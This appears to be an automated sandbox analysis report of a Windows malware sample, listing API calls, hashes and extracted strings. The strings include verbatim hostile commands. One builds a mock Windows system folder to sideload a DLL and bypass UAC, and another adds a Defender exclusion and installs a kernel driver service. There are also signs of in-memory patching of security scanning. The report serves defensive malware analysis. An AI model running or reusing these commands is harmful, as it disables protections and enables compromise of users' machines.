RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 041E5E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 041E5E9B
RegQueryValueExA.ADVAPI32(?,041E6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001), ref: 041E5EB9
RegCloseKey.ADVAPI32(?,041E5EE8,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 041E5EDB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 041E5EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 041E5F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 041E5F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 041E5F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 041E5FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 041E5FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 041E5E48
Software\Borland\Locales, xrefs: 041E5E0C, 041E5E2A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 65eaec36eb3354a06285579f461018028c6083f1cf4efe9291c4472174e89933
Instruction ID: 81e9e7ac8a8b05ff8b702e64ca1268e4952320ae1096eb48d78d3e4c7235647e
Opcode Fuzzy Hash: 65eaec36eb3354a06285579f461018028c6083f1cf4efe9291c4472174e89933
Instruction Fuzzy Hash: 7C51C779E00A5D7EFB25D6E5CCC6FFF77AD9B04744F9000A1A604E6182D774AA448B90

Uniqueness

Uniqueness Score: -1.00%

Function 041FFD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
String ID:
API String ID: 1488642996-0
Opcode ID: a974e2a1484565a22cbb4463b895426337ef3ab5256c441cdcfcbee3ed9a6c49
Instruction ID: 0e06c8bb35df3c28445273a2c4c9f18478a6047835b832e9be823eda06d1bdd7
Opcode Fuzzy Hash: a974e2a1484565a22cbb4463b895426337ef3ab5256c441cdcfcbee3ed9a6c49
Instruction Fuzzy Hash: D8116374B00704AFEB00FBFEDCC5A6EB7A8DB44618F904065B108E7251C774BD119B28

Uniqueness

Uniqueness Score: -1.00%

Function 041FFCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,000005E4,0427A44C), ref: 041FFCEA
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 041FFCF7
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan), ref: 041FFD0E
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0), ref: 041FFD1D

Strings

bcrypt, xrefs: 041FFCE9
BCryptVerifySignature, xrefs: 041FFCF5

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction ID: d6cade5ba3d0fba39653c72e30a08cde3158baa932cd32688e3d1afa188255a0
Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction Fuzzy Hash: 2DF0E9366056142DF11051255CC0EBF265CCBC17A4F54862EF6548A180D7A1AD0682B9

Uniqueness

Uniqueness Score: -1.00%

Function 041FFB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3

Strings

NtAllocateVirtualMemory, xrefs: 041FFB83
C:\Windows\System32\ntdll.dll, xrefs: 041FFB88

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: be19eebf2b72be839e6b66b764c220fc5cef9ffd50af10e415595e50ad66622e
Instruction ID: 1dda6284607757a868d25292c314745baf373371df119c9db31943f9fa01539a
Opcode Fuzzy Hash: be19eebf2b72be839e6b66b764c220fc5cef9ffd50af10e415595e50ad66622e
Instruction Fuzzy Hash: 45E075B6240248BBDB40DE99DC95EEB77ECEB18750B804016BA18D7241D774E9118B69

Uniqueness

Uniqueness Score: -1.00%

Function 041FFB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3

Strings

NtAllocateVirtualMemory, xrefs: 041FFB83
C:\Windows\System32\ntdll.dll, xrefs: 041FFB88

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 64fece702f37cc2905d344c32a840f5ca12638fe7b8bb00971d2cd10adff9277
Instruction ID: 3cd661124bc8d86898ed2b41162bd2081958fcb24c52077923919f5dc3732f4e
Opcode Fuzzy Hash: 64fece702f37cc2905d344c32a840f5ca12638fe7b8bb00971d2cd10adff9277
Instruction Fuzzy Hash: 7AE092B624024CBBDB40EF99EC95EDB77ECEB18750F804016BA18D7241D774F9118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0423B768 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7A3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7D3
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0423B7E8
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0423B814
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0423B81D

Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: bf67100ef0de85e921bd3d9eca1acf94ef93aceee3ab00317a04f5d509a4e5d6
Instruction ID: 10c1af23fc3b29a43be7727953064e50826153b62dc9e020ec843c77bbc3c7b2
Opcode Fuzzy Hash: bf67100ef0de85e921bd3d9eca1acf94ef93aceee3ab00317a04f5d509a4e5d6
Instruction Fuzzy Hash: B521C075B50608BAEB11EAA5CC82FEEB7BCAF48B04F514561B600E71C1DA74BA058794

Uniqueness

Uniqueness Score: -1.00%

Function 0423BB38 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0423BC76

Strings

OpenSession, xrefs: 0423BC18
ScanBuffer, xrefs: 0423BBBF
Initialize, xrefs: 0423BB66

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 21eefd563374f1907d77a99f41769cabbfc75d7f9a15ff42561753c58641ee4e
Instruction ID: d3f626a3ddd281ebe4db13f6c3ac810250a23a954e9080d43290ef86279c4e84
Opcode Fuzzy Hash: 21eefd563374f1907d77a99f41769cabbfc75d7f9a15ff42561753c58641ee4e
Instruction Fuzzy Hash: 17415E39B105089FEB10EFA5D9C0EEEB7B9EF58605F214826E150B7251DB71FD028B54

Uniqueness

Uniqueness Score: -1.00%

Function 0423B684 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: e4ec1e4ecfc342adcd332442eef7678f557443c95d5e49e8dfffea59dcae8b95
Instruction ID: 532b772a2cd4defb901d19640df2d959b4f95d62f7a73e50f252e371e31b760a
Opcode Fuzzy Hash: e4ec1e4ecfc342adcd332442eef7678f557443c95d5e49e8dfffea59dcae8b95
Instruction Fuzzy Hash: B721EE75E50608BAEB20EAA5CC82F9EB7BCDF44B04F514461B600F71C1D7B0BB048A64

Uniqueness

Uniqueness Score: -1.00%

Function 0423B5FC Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236

RtlInitUnicodeString.N(?,?,00000000,0423B676), ref: 0423B624
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B63A
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B659

Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: d16cc9ee7a391a20d893867c7d681b9699d773ffe10e7dcc2dcbd20459b4f1db
Instruction ID: e004e75d2ecb2efa8f846c88165529b90f53d6f14bf5a1f5aa084589c6bb69e1
Opcode Fuzzy Hash: d16cc9ee7a391a20d893867c7d681b9699d773ffe10e7dcc2dcbd20459b4f1db
Instruction Fuzzy Hash: DF0144B5A10608BAEB10EFE0CC82FDEB7BCDB48705F504461E500E2581EB74BB04CA64

Uniqueness

Uniqueness Score: -1.00%

Function 041FEF94 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 041FEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,041FEF85,?,?,?,00000000), ref: 041FEF65

CoCreateInstance.OLE32(?,00000000,00000005,041FF078,00000000,00000000,041FEFF7,?,00000000,041FF067), ref: 041FEFE3

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 282f63acc61a265fcfdaaa266653edb65b2929194b7720023c6d7dfd7beaf98a
Instruction ID: 4a31aa7393d2b7238f9695277110a4041654c5fce0c254b59b96018a64c6622d
Opcode Fuzzy Hash: 282f63acc61a265fcfdaaa266653edb65b2929194b7720023c6d7dfd7beaf98a
Instruction Fuzzy Hash: D901F774618704AFE715DF619C92C7EBBACD749700FA20435FA00D2690EB7179028964

Uniqueness

Uniqueness Score: -1.00%

Function 042495F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0424967E), ref: 04249612

Part of subcall function 04227420: GetCurrentProcessId.KERNEL32(?,00000000,04227598), ref: 04227441
Part of subcall function 04227420: GlobalAddAtomA.KERNEL32(00000000), ref: 04227474
Part of subcall function 04227420: GetCurrentThreadId.KERNEL32 ref: 0422748F
Part of subcall function 04227420: GlobalAddAtomA.KERNEL32(00000000), ref: 042274C5
Part of subcall function 04227420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04227598), ref: 042274DB
Part of subcall function 04227420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04227598), ref: 0422755F
Part of subcall function 04227420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04227570

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
String ID:
API String ID: 3557136124-0
Opcode ID: 0858e47a4dab36d5be3f7fc80b2f16d6166ed334cb0daee552324e70647ee2de
Instruction ID: 5ff1d7ea4e76d77aee6f077592698bc85a5e7b13955c3eab70bddf31cedb5649
Opcode Fuzzy Hash: 0858e47a4dab36d5be3f7fc80b2f16d6166ed334cb0daee552324e70647ee2de
Instruction Fuzzy Hash: 3AF0497931A600AFF351FF28FDC981A37E9E7DA60439144B0E51087664CBB9BC86CA54

Uniqueness

Uniqueness Score: -1.00%

Function 042426A7 Relevance: 39.0, APIs: 3, Strings: 18, Instructions: 2204
processsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

Part of subcall function 0423B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
Part of subcall function 0423B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
Part of subcall function 0423B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
Part of subcall function 0423B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733

Part of subcall function 041E8DE0: GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB

Sleep.KERNEL32(00002328,UacScan,0427A350,04247AE0,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,OpenSession,0427A350,04247AE0), ref: 04243C10

Part of subcall function 0423B5FC: RtlInitUnicodeString.N(?,?,00000000,0423B676), ref: 0423B624
Part of subcall function 0423B5FC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B63A
Part of subcall function 0423B5FC: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B659

WinExec.KERNEL32(cmd /c "C:\\Windows \\System32\\easinvoker.exe",00000000), ref: 0424430E
WinExec.KERNEL32(00000000,00000000), ref: 042445B8

Part of subcall function 04238AFC: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 04238BBF

Strings

Initialize, xrefs: 04243221
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 04244309
C : \Win do ws \ Sys tem 32\KD EC O.b at, xrefs: 04243F89
start /min cmd /c mkdir "\\?\C:\Windows " &mkdir "\\?\C:\Windows \System32" &ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "KDECO.bat" "C:\Windows \, xrefs: 042429B8
O.bat, xrefs: 0424290A, 04243361
C :\W ind ow s \Sys tem 32 \NETU TI LS.d ll, xrefs: 04243F6E
OpenSession, xrefs: 04242B9D, 04242DCA, 04243415, 0424362A, 042437E4, 04243982, 04243AA3, 04243C21, 04243E7C, 04244100, 0424439B, 042444A8, 04244645, 0424487B, 04244920, 04244BAB
C:\Windows\System32\, xrefs: 042445A2
UacScan, xrefs: 042427C7, 04242889, 042429E3, 04242ADB, 04242D4E, 04242F08, 04243399, 04243532, 04243B9B, 0424417C, 04244524, 042445C9, 04244764, 04244AB3
s.d, xrefs: 04242CF0
x.bat, xrefs: 04243FC4
start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &sc.exe start truesight , xrefs: 04243507
ScanBuffer, xrefs: 0424274B, 04242A5F, 0424315F, 042436A6, 04243860, 042439FE, 04243D19, 04244008, 04244297, 042446E8, 042447FF, 0424499C, 04244A37, 04244B2F
ScanString, xrefs: 042426CF, 04242942, 04242C19, 04242E46, 04242F84, 0424329D, 04243491, 04243B1F, 04243EF8, 042441F8, 0424431F, 0424442C
C:\Windows \System32\KDECO.bat, xrefs: 04243E5B
C :\W indo ws \S yst em 32\ eas invo ker.e xe, xrefs: 04243FA4
C:\\Windows \\System32\\easinvoker.exe, xrefs: 0424426E
UacInitialize, xrefs: 042435AE, 04243768, 04243906, 04243C9D, 04244084

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FilePath$CurrentExecLibraryMemoryNameName_ProcessStringVirtualWrite$AddressAttributesCloseCompareCreateDeleteFreeHandleInitLoadModuleProcProtectSleepUnicode
